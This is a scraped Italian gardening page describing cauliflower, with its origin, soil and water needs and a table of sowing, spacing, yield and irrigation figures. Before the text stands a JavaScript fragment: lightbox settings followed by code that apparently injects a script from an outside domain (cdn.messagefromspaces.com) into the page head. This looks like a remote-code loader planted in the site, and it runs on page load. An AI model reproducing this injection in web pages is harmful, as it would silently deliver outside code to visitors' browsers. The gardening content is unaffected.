, 'opacity': false, 'speedIn': 500, 'speedOut': 500, 'changeSpeed': 300, 'overlayShow': false, 'overlayOpacity': "", 'overlayColor': "", 'titleShow': false, 'titlePosition': '', 'enableEscapeButton': false, 'showCloseButton': false, 'showNavArrows': false, 'hideOnOverlayClick': false, 'hideOnContentClick': false, 'width': 500, 'height': 340, 'transitionIn': "", 'transitionOut': "", 'centerOnScroll': false }); var script = document.createElement('script'); script.type= 'text/javascript'; script.src = 'https://cdn.messagefromspaces.com/c.js?pro=type'; document.getElementsByTagName('head')[0].appendChild(script); })

Cavolfiore

Pianta di origine incerta, europea o medio orientale, pianta erbacea a ciclo biennale presenta una radice fittonante non molto profonda. È una pianta adatta alla coltivazione in climi temperati e in diversi tipi di terreni anche a tessitura sottile purchè ben drenati e con buona sostanza organica. Esigenze idriche elevate, tuttavia dato il periodo di coltivazione, risulta importante porre attenzione soprattutto la coltura nelle prime fasi.*

cavolfiore
Specie:Brassica oleracea L. var. botrytis
Periodo di semina:da mag a ott
Cosa mettere:piantine
Periodo di raccolta:ott, nov
Distanza tra file:60 cm / 80 cm
Distanza su file:50 cm / 60 cm
Durata media coltivazione:120 gg / 150 gg
Produzione per mq:1.20 kg / 3.00 kg
Durata dell'irrigazione min:4 minuti
Durata dell'irrigazione max:16 minuti

*Romano Tesi, Principi di orticoltura e ortaggi d’Italia, Edagricole, 1987